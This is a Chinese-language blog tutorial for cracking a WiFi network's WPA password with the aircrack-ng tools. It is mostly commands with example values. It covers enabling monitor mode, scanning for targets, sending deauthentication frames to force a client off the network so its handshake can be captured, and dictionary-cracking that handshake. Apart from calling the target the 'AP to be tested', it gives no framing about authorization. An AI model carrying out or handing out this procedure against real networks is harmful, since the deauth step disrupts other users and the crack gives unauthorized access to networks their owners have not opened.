admin管理员组

文章数量:1620917

一、准备工作

1.需要有一个无线网卡,需要支持monitor模式
2.Kali系统(自行单独安装套件也可以)
3.一个完善的密码字典

二、监听工作

首先将无线网卡连接到kali

iwconfig

查看是否连接成功

airmon-ng

可以查看无线网卡是否有监听功能

airmon-ng check

可以查看是否有进程会影响监听

airmon-ng check kill

可以关闭影响监听的进程

airmon-ng start wlan0

开启监听模式(框框里面的是开启监听模式的网卡接口)

airodump-ng <网卡接口名称>

例如:airodump-ng wlan0mon
开启监听,这里要记录需要测试AP的BSSID和CH

三、抓包工作

airodump-ng -c<CH> --bssid <BSSID> -w <握手包位置> <网卡接口名称>

例如: airodump-ng -c6 --bssid AA:AA:AA:AA:AA:AA -w ~/ wlan0mon

开始强制断开连接AP的station,对station进行一定频率的deauth包发送使Station断开重连AP可以捕获到重连的握手包
这时候需要新建一个终端,然后执行命令

aireplay-ng -0<发送次数> -a <AP的BSSID> -c <station的MAC地址> <网卡接口名称>

例如: aireplay-ng -02 -a AA:AA:AA:AA:AA:AA -c BB:BB:BB:BB:BB:BB wlan0mon

然后看看之前监听的终端,如果是下图的情况说明已经抓包成功,没有的话就继续进行deauth发送

四、破解工作
这时候应该已经把握手包保存到本地,然后开始破解

Aircrack-ng -a<握手包类型> -b <AP的BSSID> -w <字典路径> <握手包cap文件>

例如:aircrack -a2 -b AA:AA:AA:AA:AA:AA -w dic.txt 7.cap

这时候就已经将密码破解了。

本文标签: 套件密码aircrackNGwifi